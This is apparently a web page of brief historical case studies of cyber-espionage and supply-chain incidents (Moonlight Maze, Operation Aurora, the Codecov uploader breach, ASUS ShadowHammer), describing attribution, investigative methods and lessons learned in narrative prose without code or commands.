Case Studies: Historical Grid
Moonlight Maze (1996–1999)
The First Nation-State Hunt: Years of Stealthy Exfiltration That Seeded the Turla Lineage
Between 1996 and 1999, U.S. investigators traced a sprawling intrusion set — later codenamed Moonlight Maze — siphoning military, NASA, and university research data to Russia-linked infrastructure through a web of compromised relay hosts. It was among the first cyber-espionage cases to demand systematic log correlation, honeypots, and cross-agency forensics, and researchers later tied its LOKI2-based tooling to the code lineage behind Turla and today's Kazuar botnet. The case proved that patient, low-and-slow state intrusions could evade detection for years — the very playbook Secret Blizzard still runs three decades later.
Operation Aurora (2009–2010)
An Internet Explorer Zero-Day Opens Google, Adobe, and Dozens More to Persistent Theft
Disclosed by Google in January 2010, Operation Aurora was a China-linked campaign that weaponized an Internet Explorer zero-day (CVE-2010-0249) to breach at least 20 major companies and steal source code and intellectual property. Forensic teams reconstructed the intrusions through memory analysis, encrypted C2 traffic, and the IE use-after-free exploit chain. The case pushed the industry toward threat-intelligence sharing and made "advanced persistent threat" a board-level term — and that same CVE-2010-0249 resurfaced in CISA's May 20, 2026 KEV batch, proving old exploits never truly die.
Codecov Bash Uploader Breach (2021)
A Single Tampered CI Script Quietly Drains Secrets From Thousands of Build Pipelines for Two Months
In April 2021, Codecov disclosed that an attacker had used a flaw in its Docker image build to extract credentials and modify the widely used Bash Uploader script. For roughly two months, the altered script silently exfiltrated environment variables — tokens, keys, and credentials — from customers' CI/CD pipelines to an attacker-controlled server. Investigators reconstructed the intrusion via Git history of the uploader and outbound traffic analysis, and the case became the textbook example of why every secret exposed to a build runner must be treated as compromised.
ASUS ShadowHammer (2019)
Stolen Code-Signing Certificates Push a Backdoored Live Update to a Million Machines — Aimed at 600
Kaspersky's Operation ShadowHammer revealed that attackers had trojanized the ASUS Live Update utility and signed it with legitimate, stolen ASUS code-signing certificates, distributing it through official channels to roughly one million users. The implant checked each host's MAC address against a hardcoded list of about 600 targets before fetching a second-stage payload. Forensic teams matched the malicious binaries by certificate serial and timestamp — an enduring lesson in the danger of trusted signatures and surgically targeted supply-chain delivery.
— Page 2 —